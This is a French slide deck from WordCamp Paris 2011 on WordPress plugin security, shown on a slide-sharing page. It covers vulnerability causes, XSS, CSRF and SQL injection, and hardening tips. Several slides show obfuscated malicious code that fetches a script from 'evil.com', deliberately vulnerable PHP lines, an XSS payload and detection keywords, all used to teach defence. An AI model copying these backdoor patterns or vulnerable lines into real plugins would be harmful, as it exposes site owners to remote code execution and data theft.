Transients are good for you - WordCamp London 2016Transients are good for you - WordCamp London 2016
Transients are good for you - WordCamp London 2016
 
WordPress & les contributions — WordCamp Paris 2016
WordPress & les contributions — WordCamp Paris 2016WordPress & les contributions — WordCamp Paris 2016
WordPress & les contributions — WordCamp Paris 2016
 
Comment créer des hooks dans vos développements WordPress - WP Tech 2015
Comment créer des hooks dans vos développements WordPress - WP Tech 2015Comment créer des hooks dans vos développements WordPress - WP Tech 2015
Comment créer des hooks dans vos développements WordPress - WP Tech 2015
 
Pourquoi WordPress est le CMS le plus sécurisé ?
Pourquoi WordPress est le CMS le plus sécurisé ?Pourquoi WordPress est le CMS le plus sécurisé ?
Pourquoi WordPress est le CMS le plus sécurisé ?
 
Freelance & WordPress (WordCamp Paris 2015)
Freelance & WordPress (WordCamp Paris 2015)Freelance & WordPress (WordCamp Paris 2015)
Freelance & WordPress (WordCamp Paris 2015)
 
Comment se charge WordPress ? Le loading du core.
Comment se charge WordPress ? Le loading du core.Comment se charge WordPress ? Le loading du core.
Comment se charge WordPress ? Le loading du core.
 
Colours and Accessibility (a11y) - WordCamp Europe 2014 Sofia
Colours and Accessibility (a11y) - WordCamp Europe 2014 SofiaColours and Accessibility (a11y) - WordCamp Europe 2014 Sofia
Colours and Accessibility (a11y) - WordCamp Europe 2014 Sofia
 
Les données transitoires (transients) vous veulent du bien
Les données transitoires (transients) vous veulent du bienLes données transitoires (transients) vous veulent du bien
Les données transitoires (transients) vous veulent du bien
 
Choisir les bons Hooks dans vos Développements WordPress
Choisir les bons Hooks dans vos Développements WordPressChoisir les bons Hooks dans vos Développements WordPress
Choisir les bons Hooks dans vos Développements WordPress
 
10 façons de casser son site WordPress ... et de le réparer !
10 façons de casser son site WordPress ... et de le réparer !10 façons de casser son site WordPress ... et de le réparer !
10 façons de casser son site WordPress ... et de le réparer !
 

Wordpress et la sécurité des plugins

  • 1. WordPress et la Sécurité des Plugins WordPress Francophone ~ Julio Potier ~ @boiteaweb ~ WordCamp Paris 2011 ~
  • 2. 1) C'est quoi un plugin et comment ça marche ?   2) Pourquoi un plugin peut contenir une vulnérabilité ?   3) Peut-on et comment détecter du code malveillant ?   4) Les différentes failles les plus répandues.   5) Sélection de plugin Sécurité pour votre site. Bonus) Sécuriser WordPress au delà des plugins. WordPress Francophone Sommaire
  • 3. Un Plugin : C'est quoi ? Ensemble de fonctions qui viennent se greffer sur votre site dans le but de l’améliorer ou d’ajouter des fonctionnalités. Et comment ça marche ? Un plugin va utiliser ce qu’on apelle les “hooks” qui signifie “hameçons”. Un hook est un point d’entrée dans une fonction WordPress. WordPress Francophone
  • 4. Pourquoi un Plugin peut contenir une vulnérabilité : #1 Acte volontaire de nuire   #2 Le manque d'information du développeur #3 L'indifférence du développeur #4 Nouvelles découvertes de failles #5 Repository WordPress piraté WordPress Francophone
  • 5. Peut-on et comment détecter du code malveillant ? : Exemples de codes malveillants :   eval( base64_decode( &quot;ZWNobyAkX09QVElPTlNbJ2UnXQ==&quot; ) ); $a='http://www.'; $b='evil'; $c='.com/script.php'; $content = file_get_contents( $a.$b.$c ); $b(); // Équivaut à evil(); WordPress Francophone
  • 6. Peut-on et comment détecter du code malveillant ? : Exemple de code non caché : WordPress Francophone echo $_GET['e']; // XSS eval( $_GET['e'] ); // RCE $wpdb->query( $_GET['e'] ); // SQLi &quot;eval&quot;,&quot;base64&quot;,&quot;rot13&quot;,&quot;include&quot;,&quot;require&quot;,&quot;mail&quot;,&quot;wp_mail&quot; Quelques mots-clés :
  • 7. Comment choisir son Plugin : # Regarder le nombre de téléchargements # Lire le Changelog à la recherche de correctifs sécu # Trouver la date de création du plugin # Chercher sur Google &quot;security&quot; ou &quot;problem&quot; ou &quot;exploit&quot; ou &quot;faille&quot; suivi du nom du plugin # Lire les commentaires et avis sur les forums liés # Tester le plugin sur un site test ou en local # Le faire auditer si le doute subsiste WordPress Francophone
  • 8. Comment choisir son Thème : # Regarder le nombre de téléchargements # Lire le Changelog à la recherche de correctifs sécu # Trouver la date de mise à jour du thème # Chercher sur Google &quot;security&quot; ou &quot;problem&quot; ou &quot;exploit&quot; ou &quot;faille&quot; suivi du nom du thème # Lire les commentaires et avis sur les forums liés # Tester le thème sur un site test ou en local # Le faire auditer si le doute subsiste WordPress Francophone # Le trouver sur un site sérieux et compétent # Le faire faire par un intégrateur professionnel
  • 9. Les failles les plus répandues : XSS - C ross ( X ) S ite S cripting http://baw.li/dico/XSS WordPress Francophone Bonjour <?= $_GET['log'] ?> ! http://target.com/?log=<script>alert(&quot;This is a XSS vuln for #WCP2011&quot;);</script>
  • 10. Les failles les plus répandues : XSS - C ross ( X ) S ite S cripting http://baw.li/dico/XSS WordPress Francophone <input value=&quot;<?= $opts['log'] ?>&quot; /> $opts = get_option( 'mon_plugin' );
  • 11. Les failles les plus répandues : CSRF - C ross ( X ) S ite R equest F orgery   http://baw.li/dico/CSRF WordPress Francophone <form> <input name=&quot;option&quot; value=&quot;evil&quot; /> <input type=&quot;submit&quot; /> </form> Un token sécurité est manquant ! <input name=&quot;_wpnonce&quot; value=&quot;j2u1l1i2op&quot; />
  • 12. Les failles les plus répandues : SQLi - S imple Q uery L anguage I njection http://baw.li/dico/sqli WordPress Francophone $wpdb->query( 'SELECT user_login FROM wp_users WHERE user_login = ' . $opts['log'] ); Les requêtes doivent être préparées ! $wpdb->query( $wpdb->prepare( 'SELECT user_login FROM wp_users WHERE user_login = %s', $opts['log'] ) );
  • 13. Vidéo Démo WordPress Francophone http://baw.li/1334
  • 14. Liste non exhaustive de Plugins # AntiVirus # AskApache Password Protect # BulletProof Security # Secure WordPress et WP Security Scan # Exploit Scanner # Ultimate Security Checker # WordPress Plugin Security Checker # Chap Secure Login # Login Lock # One Time Password # User Role Editor # BackWPUp # Audit Trail # WordPress Firewall (!!!) WordPress Francophone
  • 15. Bonus : Sécuriser WordPress au delà des Plugins # Faites des sauvegardes régulières. # Tenez WordPress et ses plugins et thèmes à jour. # Déplacez wp-config.php d’un cran dans votre arborescence. # Choisissez un bon mot de passe. # Modifiez le préfixe &quot; wp_ &quot; de votre base de données. # Supprimez le compte “ admin ”. # Ajoutez un “ Options -Indexes ” dans votre .htaccess. # Installer quelques un des plugins cités précédemment. # Cacher le n° de version ? Non ... WordPress Francophone
  • 17. Merci ! WordPress Francophone http://studio-raspail.fr http://wordpress-fr.net http://wp-themes-pro.com http://screenfeed.fr http://seomix.fr http://geekeries.fr @screenfeedfr @rochdaniel @geekeriesfr @wordpress_fr @wp_themes_pro Retrouvez ce slide sur http://boiteaweb.fr/wcp2011

Notes de l'éditeur

  1. test